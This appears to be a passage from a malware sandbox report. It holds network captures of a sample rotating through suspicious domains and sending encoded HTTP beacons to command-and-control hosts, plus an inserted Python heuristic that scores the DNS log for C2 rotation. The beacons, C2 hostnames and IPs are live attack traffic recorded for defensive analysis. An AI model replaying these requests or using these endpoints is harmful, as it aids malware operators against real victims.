                              Sep 16, 2024 09:32:55.363876104 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.368844032 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015064955 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015131950 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015666008 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:56.017837048 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:56.022699118 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:33:09.545620918 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.550518990 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:09.550669909 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.561683893 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.566481113 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.443836927 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.443970919 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.444044113 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:11.073359013 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.094676018 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.099654913 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:12.099766016 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.111026049 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.115847111 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.022877932 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.022937059 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.023025990 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:13.620279074 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.641808033 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.646786928 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:14.646883965 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.657780886 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.662693024 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:14.662740946 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552326918 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552364111 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552453995 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:16.167171955 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.185559034 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.190752029 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:17.190937996 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.199580908 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.204432964 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095608950 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095665932 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095886946 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:18.099642992 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:18.104470015 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:23.107561111 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.112668037 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.112751961 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.123069048 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.127931118 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749639988 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749797106 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749916077 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:24.635838985 CEST5492480192.168.2.589.58.49.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 16, 2024 09:29:37.926980019 CEST | 57119 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:29:37.944380999 CEST | 53 | 57119 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:29:42.952749014 CEST | 62149 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:29:42.965519905 CEST | 53 | 62149 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:29:48.143886089 CEST | 53 | 61495 | 162.159.36.2 | 192.168.2.5
Sep 16, 2024 09:29:48.983159065 CEST | 53 | 51157 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:29:58.937052011 CEST | 57140 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:29:58.988787889 CEST | 53 | 57140 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:30:12.482532024 CEST | 61901 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:30:12.493915081 CEST | 53 | 61901 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:30:20.561389923 CEST | 65088 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:30:20.815675020 CEST | 53 | 65088 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:30:34.671411037 CEST | 59440 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:30:34.765976906 CEST | 53 | 59440 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:30:48.437232018 CEST | 50772 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:30:48.472611904 CEST | 53 | 50772 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:01.810746908 CEST | 61407 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:02.096985102 CEST | 53 | 61407 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:15.343071938 CEST | 63771 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:15.387367010 CEST | 53 | 63771 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:28.670255899 CEST | 57982 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:28.948599100 CEST | 53 | 57982 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:43.373693943 CEST | 64133 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:43.394575119 CEST | 53 | 64133 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:56.639570951 CEST | 50579 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:57.639394045 CEST | 50579 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:31:57.646022081 CEST | 53 | 50579 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:31:57.714989901 CEST | 53 | 50579 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:32:12.562190056 CEST | 49691 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:32:12.572406054 CEST | 53 | 49691 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:32:20.639574051 CEST | 56042 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:32:20.717058897 CEST | 53 | 56042 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:32:33.966893911 CEST | 49628 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:32:34.026355982 CEST | 53 | 49628 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:32:47.607671976 CEST | 60649 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:32:47.696449995 CEST | 53 | 60649 | 1.1.1.1 | 192.168.2.5
Sep 16, 2024 09:33:04.120685101 CEST | 55643 | 53 | 192.168.2.5 | 1.1.1.1
Sep 16, 2024 09:33:04.138274908 CEST | 53 | 55643 | 1.1.1.1 | 192.168.2.5
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Sep 16, 2024 09:29:37.926980019 CEST | 192.168.2.5 | 1.1.1.1 | 0x3326 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:29:42.952749014 CEST | 192.168.2.5 | 1.1.1.1 | 0x64dc | Standard query (0) | www.726075.buzz | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:29:58.937052011 CEST | 192.168.2.5 | 1.1.1.1 | 0xa95 | Standard query (0) | www.freepicture.online | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:12.482532024 CEST | 192.168.2.5 | 1.1.1.1 | 0xb9f9 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:20.561389923 CEST | 192.168.2.5 | 1.1.1.1 | 0xb65e | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:34.671411037 CEST | 192.168.2.5 | 1.1.1.1 | 0x1932 | Standard query (0) | www.golbasi-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:48.437232018 CEST | 192.168.2.5 | 1.1.1.1 | 0x6069 | Standard query (0) | www.mfgamecompany.shop | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:01.810746908 CEST | 192.168.2.5 | 1.1.1.1 | 0x7b2a | Standard query (0) | www.quilo.life | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:15.343071938 CEST | 192.168.2.5 | 1.1.1.1 | 0x2aaf | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:28.670255899 CEST | 192.168.2.5 | 1.1.1.1 | 0xea35 | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:43.373693943 CEST | 192.168.2.5 | 1.1.1.1 | 0xb6aa | Standard query (0) | www.kckartal.xyz | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:56.639570951 CEST | 192.168.2.5 | 1.1.1.1 | 0x340f | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:57.639394045 CEST | 192.168.2.5 | 1.1.1.1 | 0x340f | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:12.562190056 CEST | 192.168.2.5 | 1.1.1.1 | 0x53c5 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:20.639574051 CEST | 192.168.2.5 | 1.1.1.1 | 0x43a | Standard query (0) | www.capbear.net | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:33.966893911 CEST | 192.168.2.5 | 1.1.1.1 | 0xadc | Standard query (0) | www.groet.online | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:47.607671976 CEST | 192.168.2.5 | 1.1.1.1 | 0x6e5 | Standard query (0) | www.070001350.xyz | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:33:04.120685101 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f2a | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Sep 16, 2024 09:29:37.944380999 CEST | 1.1.1.1 | 192.168.2.5 | 0x3326 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:29:42.965519905 CEST | 1.1.1.1 | 192.168.2.5 | 0x64dc | No error (0) | www.726075.buzz | | 47.57.185.227 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:29:58.988787889 CEST | 1.1.1.1 | 192.168.2.5 | 0xa95 | No error (0) | www.freepicture.online | freepicture.online | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:29:58.988787889 CEST | 1.1.1.1 | 192.168.2.5 | 0xa95 | No error (0) | freepicture.online | | 89.58.49.1 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:12.493915081 CEST | 1.1.1.1 | 192.168.2.5 | 0xb9f9 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:20.815675020 CEST | 1.1.1.1 | 192.168.2.5 | 0xb65e | No error (0) | www.hm62t.top | hm62t.top | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:30:20.815675020 CEST | 1.1.1.1 | 192.168.2.5 | 0xb65e | No error (0) | hm62t.top | | 154.23.184.240 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:34.765976906 CEST | 1.1.1.1 | 192.168.2.5 | 0x1932 | No error (0) | www.golbasi-nakliyat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:30:34.765976906 CEST | 1.1.1.1 | 192.168.2.5 | 0x1932 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:30:34.765976906 CEST | 1.1.1.1 | 192.168.2.5 | 0x1932 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:30:48.472611904 CEST | 1.1.1.1 | 192.168.2.5 | 0x6069 | No error (0) | www.mfgamecompany.shop | mfgamecompany.shop | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:30:48.472611904 CEST | 1.1.1.1 | 192.168.2.5 | 0x6069 | No error (0) | mfgamecompany.shop | | 185.173.111.76 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:02.096985102 CEST | 1.1.1.1 | 192.168.2.5 | 0x7b2a | No error (0) | www.quilo.life | | 203.161.43.228 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:15.387367010 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aaf | No error (0) | www.qiluqiyuan.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:28.948599100 CEST | 1.1.1.1 | 192.168.2.5 | 0xea35 | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:31:28.948599100 CEST | 1.1.1.1 | 192.168.2.5 | 0xea35 | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:43.394575119 CEST | 1.1.1.1 | 192.168.2.5 | 0xb6aa | No error (0) | www.kckartal.xyz | | 104.21.20.125 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:43.394575119 CEST | 1.1.1.1 | 192.168.2.5 | 0xb6aa | No error (0) | www.kckartal.xyz | | 172.67.192.227 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:31:57.714989901 CEST | 1.1.1.1 | 192.168.2.5 | 0x340f | No error (0) | www.mizuquan.top | | 43.242.202.169 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:12.572406054 CEST | 1.1.1.1 | 192.168.2.5 | 0x53c5 | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:20.717058897 CEST | 1.1.1.1 | 192.168.2.5 | 0x43a | No error (0) | www.capbear.net | | 104.207.148.137 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:34.026355982 CEST | 1.1.1.1 | 192.168.2.5 | 0xadc | No error (0) | www.groet.online | | 185.104.29.12 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:32:47.696449995 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e5 | No error (0) | www.070001350.xyz | 070001350.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                              Sep 16, 2024 09:32:47.696449995 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e5 | No error (0) | 070001350.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
                              Sep 16, 2024 09:33:04.138274908 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f2a | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
                              • www.726075.buzz
                              • www.freepicture.online
                              • www.hm62t.top
                              • www.golbasi-nakliyat.xyz
                              • www.mfgamecompany.shop
                              • www.quilo.life
                              • www.qiluqiyuan.buzz
                              • www.bola88site.one
                              • www.kckartal.xyz
                              • www.mizuquan.top
                              • www.capbear.net
                              • www.groet.online
                              • www.070001350.xyz
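The query table above shows the sample walking through a list of candidate names at a near-constant interval, with www.monos.shop, www.318st.com and www.kxshopmr.store answered NXDOMAIN and the list wrapping back to www.monos.shop after the last entry. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it replays the DNS log transcribed from the two tables above and scores it for that rotation pattern. The thresholds it applies (at least eight distinct names, 60% of inter-query gaps within ±25% of the median, names spread over at least three TLDs) are assumptions chosen for illustration, not published detection criteria.

```python
import re
from datetime import datetime
from statistics import median

# Transcribed from the report's DNS query and answer tables above: time of each query,
# its transaction id, the name asked for, and the reply code the resolver returned.
DNS_LOG = """\
09:29:37.926980019 0x3326 www.monos.shop NXDOMAIN
09:29:42.952749014 0x64dc www.726075.buzz NOERROR
09:29:58.937052011 0xa95 www.freepicture.online NOERROR
09:30:12.482532024 0xb9f9 www.318st.com NXDOMAIN
09:30:20.561389923 0xb65e www.hm62t.top NOERROR
09:30:34.671411037 0x1932 www.golbasi-nakliyat.xyz NOERROR
09:30:48.437232018 0x6069 www.mfgamecompany.shop NOERROR
09:31:01.810746908 0x7b2a www.quilo.life NOERROR
09:31:15.343071938 0x2aaf www.qiluqiyuan.buzz NOERROR
09:31:28.670255899 0xea35 www.bola88site.one NOERROR
09:31:43.373693943 0xb6aa www.kckartal.xyz NOERROR
09:31:56.639570951 0x340f www.mizuquan.top NOERROR
09:31:57.639394045 0x340f www.mizuquan.top NOERROR
09:32:12.562190056 0x53c5 www.kxshopmr.store NXDOMAIN
09:32:20.639574051 0x43a www.capbear.net NOERROR
09:32:33.966893911 0xadc www.groet.online NOERROR
09:32:47.607671976 0x6e5 www.070001350.xyz NOERROR
09:33:04.120685101 0x5f2a www.monos.shop NXDOMAIN
"""

# Keep six fractional digits so strptime's %f accepts the nanosecond timestamps.
LINE = re.compile(r"(\d\d:\d\d:\d\d\.\d{6})\d*\s+(0x[0-9a-f]+)\s+(\S+)\s+(NOERROR|NXDOMAIN)")


def parse_log(text):
    """One event per DNS transaction; a retransmission that reuses the transaction id
    (0x340f above) is folded into its first attempt so it cannot skew the cadence."""
    events, seen = [], set()
    for line in text.splitlines():
        m = LINE.fullmatch(line.strip())
        if not m or m.group(2) in seen:
            continue
        seen.add(m.group(2))
        events.append({"ts": datetime.strptime(m.group(1), "%H:%M:%S.%f"),
                       "txid": m.group(2), "name": m.group(3).lower(), "rcode": m.group(4)})
    return events


def query_gaps(events):
    """Seconds between consecutive queries, in capture order."""
    return [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(events, events[1:])]


def summarise(events, band=0.25, min_domains=8, min_in_band=0.6, min_tlds=3):
    """Rotating-C2 heuristic (thresholds are this example's assumptions): many distinct
    names, a steady inter-query interval, and names spread over several TLDs."""
    gaps = query_gaps(events)
    med = median(gaps)
    in_band = sum(1 for g in gaps if abs(g - med) <= band * med)
    names = {e["name"] for e in events}
    tlds = {n.rsplit(".", 1)[-1] for n in names}
    # The gap that followed each answer, split by whether the name resolved.
    after = {"NXDOMAIN": [], "NOERROR": []}
    for e, g in zip(events, gaps):
        after[e["rcode"]].append(g)
    return {
        "events": len(events),
        "distinct_names": len(names),
        "nxdomain_names": len({e["name"] for e in events if e["rcode"] == "NXDOMAIN"}),
        "tlds": len(tlds),
        "gaps": len(gaps),
        "median_gap": med,
        "in_band": in_band,
        "max_gap_after_nxdomain": max(after["NXDOMAIN"], default=None),
        "min_gap_after_noerror": min(after["NOERROR"], default=None),
        "rotating_c2": (len(names) >= min_domains
                        and in_band >= min_in_band * len(gaps)
                        and len(tlds) >= min_tlds),
    }


if __name__ == "__main__":
    for key, value in summarise(parse_log(DNS_LOG)).items():
        print(f"{key:>24}: {value:.3f}" if isinstance(value, float) else f"{key:>24}: {value}")
```

On this capture the median gap between queries is about 13.5 s and 13 of the 16 gaps fall inside the band. The three that do not are the ones immediately following an NXDOMAIN answer (5.0 s, 8.1 s, 8.1 s), which is consistent with the sample moving on to the next candidate as soon as a name fails to resolve; treat that as an observation about this one capture rather than a rule for the family.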
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.5 | 49711 | 47.57.185.227 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:29:42.989041090 CEST | 461 | OUT | GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:29:43.875068903 CEST | 302 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:29:43 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.5 | 58646 | 89.58.49.1 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:29:59.009834051 CEST | 742 | OUT | POST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                              Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                              Sep 16, 2024 09:29:59.652570009 CEST | 360 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:29:59 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.5 | 58647 | 89.58.49.1 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:01.563714027 CEST | 762 | OUT | POST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 4f 58 52 68 58 4c 54 4c 4b 33 31 4d 47 31 33 68 71 30 74 67 4a 6c 66 46 77 79 49 4c 79 61 4c 68 49 62 76 56 46 64
                              Data Ascii: bX=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKOXRhXLTLK31MG13hq0tgJlfFwyILyaLhIbvVFd
                              Sep 16, 2024 09:30:02.206929922 CEST | 360 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:02 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
